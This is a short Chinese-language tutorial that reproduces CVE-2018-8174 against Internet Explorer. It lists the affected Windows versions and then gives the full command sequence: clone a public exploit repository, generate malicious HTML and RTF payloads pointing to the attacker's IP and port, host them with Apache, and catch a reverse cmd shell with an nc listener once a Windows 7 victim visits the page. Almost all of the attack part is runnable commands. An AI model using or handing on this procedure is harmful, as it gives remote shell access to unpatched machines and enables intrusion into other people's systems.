漏洞简介
这个漏洞的影响范围为
Windows 7
Windows Server 2012 R2
Windows RT 8.1
Windows Server 2008
Windows Server 2012
Windows 8.1
Windows Server 2016
Windows Server 2008 R2
Windows 10
Windows 10 Servers.
基本上影响了所有的高版本windows
复现漏洞
首先到github上面找exp然后克隆到本地
git clone https://github.com/Sch01ar/CVE-2018-8174_EXP
然后生成payload
192.168.2.117是自己的ip 端口号是1000
cd CVE-2018-8174_EXP
python CVE-2018-8174.py -u 192.168.2.117/exploit.html -o test.rtf -i 192.168.2.117 -p 1000
然后就能看到生成了两个文件一个html一个rtf文件
然后把这个exploit.html和test.rtf扔到网站目录下
mv exploit.html test.rtf /var/www/html/
启动apache
service apache2 start
启动nc监听刚才设置的端口
nc -vv -lp 1000
然后使用windows7打开ie浏览器访问
http://192.168.2.117/exploit.html
*然后ie浏览器并不会正常显示这个页面 但是攻击已经成功了
此时我们去看看我们的nc已经成功的拿到了反弹回来的cmd了